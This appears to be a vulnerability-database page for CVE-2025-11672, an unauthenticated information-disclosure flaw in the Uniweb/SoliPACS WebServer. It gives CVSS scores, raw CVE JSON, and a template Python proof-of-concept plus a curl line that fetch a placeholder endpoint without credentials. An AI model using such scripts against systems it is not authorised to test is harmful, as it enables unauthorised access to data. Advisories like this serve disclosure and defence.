Security Vulnerability Report
中文
CVE-2025-11672 CVSS 5.3 MEDIUM

CVE-2025-11672

Published: 2025-10-13 08:15:41
Last Modified: 2026-04-15 00:35:42

Description

Uniweb/SoliPACS WebServer developed by EBM Technologies has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to access a specific page to obtain user group names.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EBM Technologies Uniweb/SoliPACS WebServer(所有未修复的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11672 - Uniweb/SoliPACS WebServer Missing Authentication PoC # This PoC demonstrates how an unauthenticated attacker can access # a specific page to obtain user group names. import requests # Target configuration TARGET_URL = "http://target-host:port" # Replace with actual target URL # The specific endpoint that lacks authentication # (path may vary depending on the specific version and configuration) VULNERABLE_ENDPOINT = "/path/to/usergroup/page" # Replace with actual endpoint def exploit_missing_auth(target_url, endpoint): """ Exploit CVE-2025-11672: Access user group information without authentication. """ url = f"{target_url}{endpoint}" try: # Send unauthenticated GET request to the vulnerable page response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[+] Successfully accessed: {url}") print(f"[+] Response body:\n{response.text}") # Parse user group names from the response # The exact parsing logic depends on the response format return response.text else: print(f"[-] Unexpected status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("[*] CVE-2025-11672 PoC - Missing Authentication in Uniweb/SoliPACS WebServer") print(f"[*] Target: {TARGET_URL}") result = exploit_missing_auth(TARGET_URL, VULNERABLE_ENDPOINT) if result: print("[*] User group names obtained successfully.") else: print("[*] Exploit failed or target not vulnerable.") # Simple curl command alternative: # curl -v "http://target-host:port/path/to/usergroup/page" # No authentication headers or cookies required.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11672", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:40.550", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uniweb/SoliPACS WebServer developed by EBM Technologies has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to access a specific page to obtain user group names."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10420-d1a4f-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10419-de614-1.html", "source": "[email protected]"}]}}